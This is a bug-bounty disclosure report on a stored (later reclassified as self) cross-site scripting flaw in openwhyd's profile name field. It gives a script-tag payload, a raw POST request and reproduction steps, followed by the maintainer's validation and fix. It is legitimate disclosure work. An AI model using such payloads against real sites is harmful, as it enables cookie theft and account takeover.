Cross-site Scripting (XSS) - Stored in openwhyd/openwhyd


Reported on

Oct 17th 2021


The openwhyd open-source application and are vulnerable to a stored cross-site scripting vulnerability via user profiles. Malicious users can inject arbitrary javascript into the username setting on their profiles which, when visited by external users, would execute javascript in victim browsers. This is a serious vulnerability and should be triaged immediately to protect users.

Proof of Concept

payload in browser: John Doe "><script src=></script> payload in request:

POST /api/user HTTP/2
Cookie: _ga=GA1.2.1710874691.1634429460; _gid=GA1.2.32803653.1634429460; cookieconsent_status=dismiss; whydSid=s%3ACvqf3Q9bbgPSn9TFbSIW5MGlgKrRMxlb.anmicGodGtyIqzLo0BPEXz0c%2BbUxjqptLCOPopLBaQY; _gat=1; _dd_s=rum=1&id=93cf7abc-e858-4a40-bd8c-71ecaa2215b9&created=1634429459651&expire=1634432938003
Content-Length: 147
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Steps to Reproduce

  1. Go to User profile[username]
  2. Click edit profile then edit profile info
  3. Enter payload into name field. This PoC uses an xsshunter payload to automatically get a call-back of when the payload triggers. The payload used was john doe"><script src=></script>
  4. Save
  5. reload the profile,[username]
  6. The payload will execute

The vulnerable component is the user profile badge and name field, located at the top right of the page


This is a severe vulnerability. Malicious users can create profiles with embedded payloads, send links to target victims, and have their arbitrary javascript execute in victim browsers. Payloads could be crafted to steal authentication cookies and session information, such as whydSid, which could lead to complete account takeover.

We have contacted a member of the openwhyd team and are waiting to hear back 2 years ago
Tyler Butler
2 years ago


I just noticed, this is apparently a self XSS, the payload executes on[user] only when that [user] is logged in. The vulnerable component is not used when a victim opens a vulnerable[user] profile because the component is used as the "logged in" user's avatar. It's still likely the same logic was used elsewhere in the application

Tyler Butler modified the report
2 years ago
Adrien Joly validated this vulnerability 2 years ago
Tyler Butler has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adrien Joly
2 years ago


Thank you for reporting, Tyler, and for the precise explanation of the problem + steps to reproduce it! Would you be interested in submitting a fix through a pull request?

Adrien Joly marked this as fixed in 1.45.5 with commit 14e0d4 2 years ago
Adrien Joly has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation